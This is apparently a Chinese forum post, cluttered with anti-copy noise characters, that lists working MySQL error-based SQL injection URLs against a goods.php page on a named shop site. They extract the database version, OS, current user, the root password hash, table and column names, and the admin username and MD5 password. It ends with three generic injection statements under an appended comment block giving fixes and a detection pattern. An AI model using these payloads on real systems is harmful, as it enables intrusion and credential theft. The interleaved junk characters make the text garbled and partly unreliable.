判断版本号
$ U4 @8 B4 G' Q. w9 s; [http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
$ D1 d7 |( \& p3 u8 T. V/ H3 e3 A1 G$ Y0 V8 i4 W6 x9 g: h
判断系统
3 ^9 H( g- d/ p, c+ D D/ Fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
" O/ ^/ k2 A8 S- M: S1 D, ^
( k3 m2 v4 \+ S9 }0 U+ `
5 H9 s, ] ~: y) F. k# L7 j3 i I. I' E( L9 f4 v3 a
当前 user()
1 K# p2 F {' ]. X8 v4 d |
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
9 X4 T2 h9 N5 @- Z* R9 D1 f
; ~ q: b* d# ~& i& u9 {: Z+ u
/ ?7 `. m5 ~" J6 W' f& V+ q8 j. v4 z9 Z4 B
当前 database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%234 B7 ~2 @( E1 r- h1 r8 s0 u
7 Y( F2 |8 a4 k/ ?2 v; t4 M! y( l+ L% q: f3 r
7 T: H' e1 p* [
/ w) c* x2 E( z' A$ Y$ u: {# m
root hash
# I( c) v' K6 b/ e" E/ o' F9 n$ R- M
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" n/ l9 h& Y. u0 | I
. _" e6 b/ R j; R x' A8 p- q; r1 U
" P+ ~, ]2 Y1 v: n& U
当前 数据库表名
1 A3 E( j U- p7 }3 q* t# e0 ]6 `4 P
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. a0 [. |2 i) c* j2 k2 \) R' _
7 N; p: A( M5 v
9 m6 ?& J; q" e( U6 a3 B: e7 ^$ J
当前 数据库 user_name 字段
+ G/ |& Y7 \/ r3 B: \
- E9 q1 ?" d" j" D3 G( j' whttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23. _( z! u* R# O5 Z
5 h" M: p5 M0 j7 E3 J
当前 数据库 字段 password
' M, v3 U3 {9 E, r+ P# e2 g$ y! b: xhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ X( O/ Q4 L7 ?9 v; _) F6 \
+ [7 b: X. _8 b" l; M5 z+ @
# t$ m8 |5 p( z1 K. t6 P- m3 E
' E' B6 M$ Q \" h6 E. P ]2 [% g
获得 admin passwd(md5)
, a" _( E* d! @5 E% j5 s# R) m7 T8 v9 _1 z. x4 a
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23$ x3 a# N+ n5 z& a! ]& l
报错注射
-- Three instances of the same MySQL error-based injection shape: an inner SELECT is
-- concatenated with floor(rand(0)*2), aliased x, and fed to COUNT(*) ... GROUP BY x
-- over information_schema.tables. Each statement differs only in the value probed:
-- version() (first), a username from admin_table (second), a SCHEMA_NAME from
-- information_schema.SCHEMATA (third).
-- Defender notes: the pattern depends on (1) `uid` being interpolated into the statement
-- rather than bound as a parameter, (2) raw database error text reaching the HTTP response,
-- and (3) the application's DB account being allowed to read information_schema and
-- admin_table. Fix (1) with a bound parameter, (2) with generic error pages and server-side
-- logging only, (3) with a least-privilege DB user. For detection, the co-occurrence of
-- `floor(rand(0)*2)`, `group by x` and `information_schema` in a single request parameter
-- is a high-signal WAF / access-log pattern.
-- The stray characters appended to or prefixed on each line are forum anti-copy noise from
-- the paste, not part of the SQL; the third line appears to be a WHERE-clause fragment
-- beginning `and(` with a noise prefix fused onto it (verify before reuse in any test case).
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)& ]$ p/ ], w% k( D
9 h6 e& \, ]5 @. V: W5 ZSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a) P. M4 Z% R/ {% y
$ a. }! h- Z, r$ j7 ~ B1 band(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |